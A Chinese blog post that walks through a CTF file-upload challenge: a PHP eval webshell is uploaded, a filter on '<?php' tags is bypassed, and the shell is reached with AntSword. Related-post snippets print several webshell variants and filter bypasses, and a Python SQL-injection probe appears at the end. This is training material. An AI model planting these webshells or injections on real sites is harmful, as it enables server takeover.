i春秋web 想怎么传就怎么传,就是这么任性。

最新推荐文章于 2024-11-20 23:53:08 发布
最新推荐文章于 2024-11-20 23:53:08 发布
阅读量274 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: ctf 文章标签: unctf php javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/enginers/article/details/117092175
本文探讨了一次PHP文件上传漏洞的利用过程,通过抓包发现文件上传到`u/flag.php`并触发了`eval($_POST['a'])`。尽管存在过滤,但通过特定写法成功绕过,实现了木马上传。随后连接蚁剑,验证了攻击的有效性。文章聚焦于Web安全和PHP后端开发的安全防护问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述
文件上传题,可联想到一句话木马
在这里插入图片描述

通过抓包知道上传的文件到u/flag.php里面,然后就可以写木马上传了

上传成功后访问上传的文件,发现直接输出了

eval($_POST[‘a’]) ?>
即被过滤了,查了一下网上有一种写法
在这里插入图片描述
连接蚁剑,成功
在这里插入图片描述
在这里插入图片描述

[系统安全] 二.如何学好逆向分析及吕布游戏逆向案例
杨秀璋的专栏
12-13 9791
娜璋AI安全之家于2020年8月18日开通,将专注于Python和安全技术,主要分享Web渗透、系统安全、CVE复现、威胁情报分析、人工智能、大数据分析、恶意代码检测等文章。真心把自己近十年的所学所做所感分享出来,与大家一起进步。 系统安全系列作者将深入研究恶意样本分析、逆向分析、攻防实战等,通过在线笔记和实践操作的形式分享与博友们学习,希望能与您一起进步。前文作者先带领大家学习什么是逆向分析,这篇文章将继续普及逆向分析基础知识,告诉大家如何学好逆向分析,并结合作者经验给出逆向分析的路线推荐,最后给出吕布
暑期web10:基础的文件上upload(i春秋)、上绕过(实验吧)
qq_41618162的博客
08-18 2876
介于之前做了个包括文件上步骤的题,突然拿两个之前做过的文件上题来回顾一下一些基础做法 首先是实验吧的上绕过 首先我们上最基础的一句话木马:<?php @eval($_POST['pass']);?> 反馈是‘不被允许的文件类型,仅支持上jpg,gif,png后缀的文件’ 于是我把他的后缀改为.jpg再上,又回显‘必须上后缀名为php的文件才行’ 做成php...
Web-Upload[i春秋][50pt]
Laurel_60的博客
08-05 1387
> 去年写的,后面有点问题,懒得改了,要看就直接去翻我重写的另一篇吧2333 > https://laure1.github.io/2019/08/29/Summary-of-Web/#Upload
题目内容: 怎么就怎么,就是这么任性
weixin_42695187的博客
07-07 693
打开题目 进入网页 上一个一个一句话病毒,以.php文件格式上 然后检查源代码
i春秋-CTF-web文件上
在Web和Reverse坑里游泳中。。。。
04-27 2035
前言 本来吧,悄悄摸鱼,整点啥打发时间,看视频太明显,于是做做题,眉头紧锁,仔细思考,装作工作很难的样子。 这回选择web类型的题目,主要是好久没做了,手有点生,找个简单的文件上练练。 打开题目环境发现: 好像是没有什么特别的。 但是往下翻看却是别有洞天。 众所周知,php是后端语言,正常情况下前端是看不到的,也就是说,出题人还是很贴心的(虽然我觉得出题人没那么好心)。 <?php header("Content-Type:text/html; charset=utf.
i春秋-ctf 文件上
AAAAAAAAAAAA66的博客
11-08 9411
文章目录 前言 一、题目 二、解题步骤 1.我的错误思路 2.正确解题姿势 总结 前言 CTF小白,这道题思考了很久,i春秋上现在也没write up,卡了1天了,后面在buuctf找到了题解答。通过这一天让我对文件上有了更深的理解。 目录 文章目录 一、题目进入环境。 二、解题步骤 1.我的错误思路 2.​​​​​​正确解题姿势 总结 一道普通的文件上题,通过一天的思考我得到这类题目的思路总结。 提示:以下是本篇文章正文内容,下
i春秋 upload
慢慢变小佬的博客
08-11 1843
 打开题目链接: 可以随意上文件, 上图片,txt文件,php文件等都能上上去; 试着上一句话; 当上一句话木马时,上成功后,原文件变成了如下: 把&lt;?和php过滤掉了,再上另一个一句话;  &lt;script language="PHP"&gt;  @eval($_POST["code"]); &lt;/script&gt; 上后连接菜刀;   ...
i春秋CTF训练 Web Upload
椰奶冻不安全的博客
06-21 1431
Misc Web 爆破-2](https://www.ichunqiu.com/battalion?t=1) 题目内容:怎么就怎么,就是这么任性。 tips:flag在flag.php中 链接需到ichunqiu网站申请 访问网页得到文件上输入框 明显是文件上漏洞 方法一:上木马 上小马 <?pHp @eval($_POST['123']);?> 页面显示 @eval($_POST['123']);?> 把<?和php过滤了,可以用大小写绕过php的过
“百度杯”CTF比赛 九月场--web Upload
hanjinrui15的博客
12-30 753
“百度杯”CTF比赛 九月场--web Upload基础知识1、什么是一句话木马?2、一句话木马的简要原理3、html渲染过程解析渲染该过程主要分为以下步骤:解决方案:4、PHP中substr()函数解题思路1、代码分析2、求解题目总结 基础知识 1、什么是一句话木马? 最简单的理解就是,一句话木马上到网站后台,然后我们可以通过提交参数等的方式去获取shell,比如拿菜刀或者蚁剑等工具。比如下面这段php一句话木马: <?php @eval($_POST['key']) ?> 【基本原理
CTF学习记录 i春秋 《从0到1:CTFer成长之路》文件上
mastergu2的博客
10-21 4359
21.10.19 第二次开始学习CTF 感觉很有收获 至少有让自己忙起来了的感觉 感觉有一些学习状态了 打算重新记录一下学习笔记!加油 我会坚持下去的! 题目代码 首先附上题目的代码段(不完整) show_source(__FILE__); }else{ $file = $_FILES['file']; if(!$file){ exit("请勿上空文件"); } $name = $file['name']; $dir = 'upload/
i春秋-123(文件上绕过,双写绕过)
2301_79090248的博客
11-20 594
zhangyuzhen1995 1.绕过<?限制2.绕过<?pgp?>限制。
i春秋WEB之Upload
金 帛的博客
02-12 522
i春秋webWP
i春秋web
qq_58091216的博客
03-28 4525
3.21 1.题目名称:常见的搜集 题目内容:一共3部分flag 敏感文件 解题思路:用dirsearch扫描网站 ,发现三个文件robots.txt,index.php~ ,.index.php.swp, dirsearch -u http://eci-2zegi8jh6a7iw18p2ptc.cloudeci1.ichunqiu.com/ 我们依次访问就可以得到flag 2.题目名称:粗心的小李...
i春秋做题记录 web(一)
未完成的歌~的博客
11-03 1709
前言: 时间过的真快呀,一转眼半学期就过去了( ̄m ̄);攻防世界上的题差不多刷完了(剩下的都是不会的(T_T)),这周就来做做I春秋的题吧。 1、怎么就怎么,就是这么任性。 2、出题人就告诉你这是个注入,有种别走! 3、这个真的是爆破。 4、没错!就是文件包含漏洞
i春秋WEB CTF 2
cbhjerry的博客
11-16 2893
题6:SQL,出题人就告诉你这是个注入,有种别走! 解题:这是一个存在sql注入漏洞的题目, 通过手工测试发现程序对"SELECT","ORDER"进行了识别,即判断为注入行为,虽然对"AND"不进行识别,但如果其后面有"="同样认定为注入行为。同时发现了对"&lt;&gt;"进行了过滤,因此可将以上3个关键字换成"SELEC&lt;&gt;T",&quo
“百度杯”CTF比赛 九月场 upload
drip_big的博客
04-10 469
“百度杯”CTF比赛 九月场 题目内容: 怎么就怎么,就是这么任性。 tips:flag在flag.php中 测试可以上文件类型 .txt .php.js 都可以上成功 说明在上文件的过程中并无拦截 题目中的“怎么就怎么”说的没错 构造php脚本 既然有提示“tips:flag在flag.php中 ”,故只要可以阅读flag.php的内容即可。 <?php // get...
一句话木马时<? php被过滤的解决办法
ancan8807的博客
09-15 3354
i春秋“百度杯”CTF比赛 九月场 web题 upload 题目描述:怎么就怎么,就是这么任性。tips:flag在flag.php中 打开题目发现 于是到通过上一句话木马进入后台 上一句话木马 <?phpeval($_POST['ant']);?> 提示上成功,查看网页源代码提示 php文件上到u/antsword.php...
“百度杯”CTF比赛 九月场——Web-Upload
大方子
08-06 1649
============================= 个人收获: 1.PHP标记的不同写法 2.PHP标记被过滤可以试试大小写 ==============================     不知道为什么写这篇文章的时候优快云的服务器出现问题一直无法上图片,索性就不了,因为这题挺简单的。   题目开始是说让我们随便上文件,那么我们找个一句话直接上 &lt...
真的很简单 i春秋
WEB渗透测试 从入门到萌新
04-12 1226
题目描述 在环境里面 浏览器 访问http://file.ichunqiu.com/49ba59ab下载dedeCMS。 下载工具进行爆破 第一个是账号 、第二个是md5加密MD5免费在线解密破解_MD5在线加密-SOMD5 接下来是找后门目录。查找后台地址,手动输了几个常见的,结果不行;用御剑扫了一下,结果也扫不出来 我们进行百度搜索cms相关后台 dedeCMS漏洞:mysqli_error_trace.inc 文件里会残留后台路径。 dedeCMS目录中的data...
i春秋ctf web
最新发布
01-04
### i春秋CTF Web安全挑战资源 #### 关于i春秋平台及其特色 i春秋是一个提供网络安全培训和竞赛的在线教育平台,该平台不仅提供了丰富的课程学习资料还举办了多次高水平的安全赛事。其中提到的百度杯CTF夺旗大战是由百度安全应急响应中心与i春秋共同发起的一项活动,这项比赛具有较长的时间跨度以及较高的频率特点[^1]。 #### Web安全挑战详情 对于希望参与Web方向CTF练习的人来说,在i春秋上可以找到许多优质的实践机会。通过访问[i春秋官网](http://www.ichunqiu.com),能够获取到有关往届比赛中涉及的具体题目解析及线下总决赛期间所使用的试题重现等内容,这对于提升个人技能水平十分有益处[^2]。 此外,除了官方提供的历年真题外,还可以关注一些第三方站点如[ADWorld XCTF社区](https://adworld.xctf.org.cn/),尽管有时会遇到服务器维护的情况,这里同样收录了不少高质量的Web类CTF挑战项目供爱好者们交流探讨[^3]。 为了更好地准备这类基于Web的应用程序渗透测试环节,建议深入研究常见的漏洞类型(SQL注入、XSS跨站脚本攻击等),并尝试利用工具辅助分析目标系统的潜在弱点。同时也可以参考其他开源平台上分享的技术文档来补充理论知识,比如RPISEC团队整理的一系列二进制逆向工程教程就非常适合用来强化底层原理的理解[^4]。 ```python import requests def check_sql_injection(url, param): payload = "' OR '1'='1" test_url = f"{url}?{param}={payload}" response = requests.get(test_url) if "You have an error in your SQL syntax;" in response.text: print(f"[+] Potential SQL Injection found at {test_url}") else: print("[-] No obvious signs of SQL Injection") # Example usage (for educational purposes only!) check_sql_injection('http://example.com/login', 'username') ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值